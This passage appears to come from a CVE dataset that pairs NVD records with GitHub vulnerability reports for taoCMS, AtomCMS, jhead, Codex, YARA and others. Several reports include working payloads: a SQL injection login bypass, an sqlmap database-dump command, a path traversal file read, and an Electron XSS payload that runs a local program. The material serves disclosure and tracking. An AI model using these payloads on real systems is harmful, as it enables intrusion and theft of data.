{
"source": "security@apache.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://pulsar.apache.org/admin-rest-api/#operation/getLastMessageId"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/apache/pulsar/issues/11814"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread/8n3k7pvyh4cf9q2jfzb6pb32ync6xlvr"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://pulsar.apache.org/admin-rest-api/#operation/getLastMessageId"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:pulsar:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E7316A0A-1852-4DD2-926A-06FEA7D1D2FA",
"versionEndExcluding": "2.6.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:apache:pulsar:*:*:*:*:*:*:*:*",
"matchCriteriaId": "66FA9B80-0C01-492B-83B1-728214C6C810",
"versionEndExcluding": "2.7.3",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.7.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:apache:pulsar:2.8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D500E36D-2790-4ADB-B635-04223242421B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"863"
] | 863 | https://github.com/apache/pulsar/issues/11814 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"apache",
"pulsar"
] | 
| [Pulsar admin] admin command 'get-message-by-id' can get message by messageId regardless of topic name | https://api.github.com/repos/apache/pulsar/issues/11814/comments | 10 | 2021-08-27T07:58:36Z | 2021-09-08T19:04:55Z | https://github.com/apache/pulsar/issues/11814 | 980,981,768 | 11,814 | 3,168 |
CVE-2022-24223 | 2022-02-01T19:15:07.840 | AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165922/Atom-CMS-2.0-SQL-Injection.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/thedigicraft/Atom.CMS/issues/255"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165922/Atom-CMS-2.0-SQL-Injection.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/thedigicraft/Atom.CMS/issues/255"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8949C5AC-7D10-43A8-929D-B6FCFE9F2DC7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/thedigicraft/Atom.CMS/issues/255 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"thedigicraft",
"Atom.CMS"
] | In /admin/login.php:
`<?php
.....
if($_POST) {
$q = "SELECT * FROM users WHERE email = '$_POST[email]' AND password = SHA1('$_POST[password]')";
$r = mysqli_query($dbc, $q);
.....
?>`
When logging in at the background, you can log in at the background with the wrong password and account by the method of post.
post: /admin/login.php
email=alan@alan.com'or '1'='1&password=123。
then, I can log in to the system with the wrong password | Sql Injection in /admin/login.php | https://api.github.com/repos/thedigicraft/Atom.CMS/issues/255/comments | 6 | 2022-01-28T11:37:41Z | 2022-12-22T21:15:43Z | https://github.com/thedigicraft/Atom.CMS/issues/255 | 1,117,305,691 | 255 | 3,169 |
CVE-2020-26208 | 2022-02-02T12:15:07.783 | JHEAD is a simple command line tool for displaying and some manipulation of EXIF header data embedded in Jpeg images from digital cameras. In affected versions there is a heap-buffer-overflow on jhead-3.04/jpgfile.c:285 ReadJpegSections. Crafted jpeg images can be provided to the user resulting in a program crash or potentially incorrect exif information retrieval. Users are advised to upgrade. There is no known workaround for this issue. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.4,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 4.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://bugs.launchpad.net/ubuntu/+source/jhead/+bug/1900821"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/F-ZhaoYang/jhead/commit/5186ddcf9e35a7aa0ff0539489a930434a1325f4"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/F-ZhaoYang/jhead/security/advisories/GHSA-7pr6-xq4f-qhgc"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Matthias-Wandel/jhead/issues/7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://bugs.launchpad.net/ubuntu/+source/jhead/+bug/1900821"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/F-ZhaoYang/jhead/commit/5186ddcf9e35a7aa0ff0539489a930434a1325f4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/F-ZhaoYang/jhead/security/advisories/GHSA-7pr6-xq4f-qhgc"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Matthias-Wandel/jhead/issues/7"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jhead_project:jhead:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F4043AC5-DC93-4FE4-8675-6AB0B60A385C",
"versionEndExcluding": "3.04",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/Matthias-Wandel/jhead/issues/7 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"Matthias-Wandel",
"jhead"
] |
poc:https://bugs.launchpad.net/ubuntu/+source/jhead/+bug/1900821/+attachment/5424955/+files/poc%20%282%29
```
fstark@fstark-virtual-machine:~/jhead$ ./jhead fuzz1\:id\:000015\,sig\:06\,src\:000476\,time\:412880\,op\:arith8\,pos\:31\,val\:+29
=================================================================
==957==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000efd2 at pc 0x7f6d38f94676 bp 0x7ffd0abe47d0 sp 0x7ffd0abe3f78
READ of size 4 at 0x60200000efd2 thread T0
#0 0x7f6d38f94675 in memcmp (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x77675)
#1 0x40e810 in ReadJpegSections /home/fstark/jhead/jpgfile.c:285
#2 0x410e86 in ReadJpegSections /home/fstark/jhead/jpgfile.c:125
#3 0x410e86 in ReadJpegFile /home/fstark/jhead/jpgfile.c:378
#4 0x40858b in ProcessFile /home/fstark/jhead/jhead.c:905
#5 0x402f2c in main /home/fstark/jhead/jhead.c:1756
#6 0x7f6d3886a83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#7 0x406708 in _start (/home/fstark/jhead/jhead+0x406708)
0x60200000efd2 is located 0 bytes to the right of 2-byte region [0x60200000efd0,0x60200000efd2)
allocated by thread T0 here:
#0 0x7f6d38fb5602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x40e4a8 in ReadJpegSections /home/fstark/jhead/jpgfile.c:172
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 memcmp
Shadow bytes around the buggy address:
0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9df0: fa fa fa fa fa fa fa fa fa fa[02]fa fa fa 02 fa
0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==957==ABORTING
``` | heap-buffer-overflow on jhead-3.04/jpgfile.c:285 ReadJpegSections | https://api.github.com/repos/Matthias-Wandel/jhead/issues/7/comments | 3 | 2020-10-22T09:49:38Z | 2020-10-23T13:18:57Z | https://github.com/Matthias-Wandel/jhead/issues/7 | 727,231,481 | 7 | 3,170 |
CVE-2021-44866 | 2022-02-03T14:15:07.903 | An issue was discovered in Online-Movie-Ticket-Booking-System 1.0. The file about.php does not perform input validation on the 'id' paramter. An attacker can append SQL queries to the input to extract sensitive information from the database. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/projectworldsofficial/Online-Movie-Ticket-Booking-System-in-php/issues/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/projectworldsofficial/Online-Movie-Ticket-Booking-System-in-php/issues/6"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:projectworlds:online_movie_ticket_booking_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C5DE67C1-6787-49CD-8DFA-3747E0DCF7AF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/projectworldsofficial/Online-Movie-Ticket-Booking-System-in-php/issues/6 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"projectworldsofficial",
"Online-Movie-Ticket-Booking-System-in-php"
] | Hey,I think there is a SQL Injection vulnerability in this system.
The file about.php does not perform input validation on the 'id' paramter. So An attacker can append SQL queries to the input to extract sensitive information from the database.
1.Navigate to the about page:
Example:http://172.16.180.135:8022/about.php?id=2
2.Save the request to file.
Example:
GET /about.php?id=2 HTTP/1.1
Host: 172.16.180.135:8022
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=9796kkls37f6d7l72qc806mge9
Upgrade-Insecure-Requests: 1
3.Run SQLmap on the file
Example:sqlmap -r request.txt --dbms=mysql --threads=10
4.Get sensitive information from the database

about.php:

| SQL Injection vulnerability via the "id" parameter in about.php | https://api.github.com/repos/projectworldsofficial/Online-Movie-Ticket-Booking-System-in-php/issues/6/comments | 0 | 2021-12-06T08:59:58Z | 2021-12-06T08:59:58Z | https://github.com/projectworldsofficial/Online-Movie-Ticket-Booking-System-in-php/issues/6 | 1,071,892,369 | 6 | 3,171 |
CVE-2022-23316 | 2022-02-04T12:15:07.673 | An issue was discovered in taoCMS v3.0.2. There is an arbitrary file read vulnerability that can read any files via admin.php?action=file&ctrl=download&path=../../1.txt. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/taogogo/taocms/issues/15"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/taogogo/taocms/issues/15"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*",
"matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"552"
] | 552 | https://github.com/taogogo/taocms/issues/15 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"taogogo",
"taocms"
] | # analysis
The location of the vulnerability is line 55 in \taocms\include\Model\File.php and we can see that the path parameter is passed directly to file_get_contents function without filtering


# poc
After login as admin,Enter the file management interface and edit function

Get packets using brup
Any file can be read after changing the path parameter
 | arbitrary file read vulnerability | https://api.github.com/repos/taogogo/taocms/issues/15/comments | 1 | 2022-01-10T07:43:07Z | 2022-12-20T03:17:15Z | https://github.com/taogogo/taocms/issues/15 | 1,097,551,779 | 15 | 3,172 |
CVE-2021-44983 | 2022-02-04T14:15:08.330 | In taocms 3.0.1 after logging in to the background, there is an Arbitrary file download vulnerability at the File Management column. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/taogogo/taocms/issues/10"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/taogogo/taocms/issues/10"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:taogogo:taocms:3.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "E6755F50-8491-4D27-B3D7-C28CC606C41A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"552"
] | 552 | https://github.com/taogogo/taocms/issues/10 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"taogogo",
"taocms"
] |
First, we enter the background and use the administrator admin we created:

Let's click "file management" on the left:

Then use Burp Suite and click Download to grab the request package


Changing the “path” parameter

| There is a Arbitrary file download attack at " File Management column"(administrator authority) | https://api.github.com/repos/taogogo/taocms/issues/10/comments | 0 | 2021-12-10T02:25:30Z | 2021-12-10T02:25:30Z | https://github.com/taogogo/taocms/issues/10 | 1,076,352,526 | 10 | 3,173 |
CVE-2021-43635 | 2022-02-04T18:15:07.287 | A Cross Site Scripting (XSS) vulnerability exists in Codex before 1.4.0 via Notebook/Page name field, which allows malicious users to execute arbitrary code via a crafted http code in a .json file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Product",
"Third Party Advisory"
],
"url": "https://github.com/jcv8000/Codex"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jcv8000/Codex/issues/8"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/jcv8000/Codex/releases/tag/v1.4.1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Third Party Advisory"
],
"url": "https://github.com/jcv8000/Codex"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jcv8000/Codex/issues/8"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/jcv8000/Codex/releases/tag/v1.4.1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:codex_project:codex:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A43C505F-D811-4731-880F-45CDDAC636AF",
"versionEndExcluding": "1.4.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/jcv8000/Codex/issues/8 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"jcv8000",
"Codex"
] | ### Issue
Cross-site scripting(XSS) on Codex Notebook/Page name lead to code execution.
### Reproduction
1. Open Codex
2. Create new Notebook
3. Insert payload on the Notebook(or page) name field
On Mac
`<a href=x onmouseover="require('electron').shell.openExternal('file:///System/Applications/Calculator.app')">test</a>`
On Windows
`<a href=x onmouseover="require('electron').shell.openExternal('C:/Windows/System32/calc.exe')">test</a>`
4. Once you move your mouse over the link "test" , Calculator will be opened.
<img width="949" alt="截圖 2021-09-10 下午4 59 27" src="https://user-images.githubusercontent.com/64322368/132828807-4742e2b6-c748-4ca1-8823-a6f484129d7f.png">
### Mitigation
Disable nodeIntegration
| Code Execution vulnerability on Codex | https://api.github.com/repos/jcv8000/Codex/issues/8/comments | 1 | 2021-09-10T09:06:09Z | 2021-09-10T23:06:32Z | https://github.com/jcv8000/Codex/issues/8 | 993,038,886 | 8 | 3,174 |
CVE-2021-45429 | 2022-02-04T19:15:08.060 | A Buffer Overflow vulnerablity exists in VirusTotal YARA git commit: 605b2edf07ed8eb9a2c61ba22eb2e7c362f47ba7 via yr_set_configuration in yara/libyara/libyara.c, which could cause a Denial of Service. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/VirusTotal/yara/issues/1616"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/VirusTotal/yara/issues/1616"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:virustotal:yara:*:*:*:*:*:*:*:*",
"matchCriteriaId": "98D52101-1922-43B6-877D-A0AE6213E8F3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "4.2.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/VirusTotal/yara/issues/1616 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"VirusTotal",
"yara"
] | version: master (commit https://github.com/VirusTotal/yara/commit/822e532c64759240b51ce8e439960ae4e90b71f0)
command: yara $FILE strings
PoC is a file that can contain any string, such as "hello". Here is the trace reported by ASAN:
```
root@d8a714203f6e:/path_to_yara/bin# ./yara PoC strings
=================================================================
==25743==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000763280 at pc 0x00000052260c bp 0x7ffda7b01e60 sp 0x7ffda7b01e58
READ of size 8 at 0x000000763280 thread T0
#0 0x52260b in yr_set_configuration /path_to_yara/libyara/libyara.c:395:26
#1 0x4eef83 in main /path_to_yara/cli/yara.c:1394:3
#2 0x7f7d5f39d83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#3 0x41b5e8 in _start (/path_to_yara/build/bin/yara+0x41b5e8)
0x000000763284 is located 0 bytes to the right of global variable 'max_process_memory_chunk' defined in 'cli/yara.c:167:12' (0x763280) of size 4
SUMMARY: AddressSanitizer: global-buffer-overflow /path_to_yara/libyara/libyara.c:395:26 in yr_set_configuration
Shadow bytes around the buggy address:
0x0000800e4600: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
